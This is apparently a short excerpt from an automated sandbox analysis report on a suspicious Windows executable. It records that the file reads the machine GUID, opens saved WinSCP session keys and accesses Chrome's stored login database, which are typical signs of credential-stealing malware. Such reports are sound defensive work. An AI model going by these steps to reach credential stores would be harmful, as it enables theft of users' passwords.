Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Process Stats: CPU usage > 90% for more than 60s |
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid | Jump to behavior |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF7674B92C4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, | 0_2_00007FF7674B92C4 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions | Jump to behavior |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data | Jump to behavior |
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.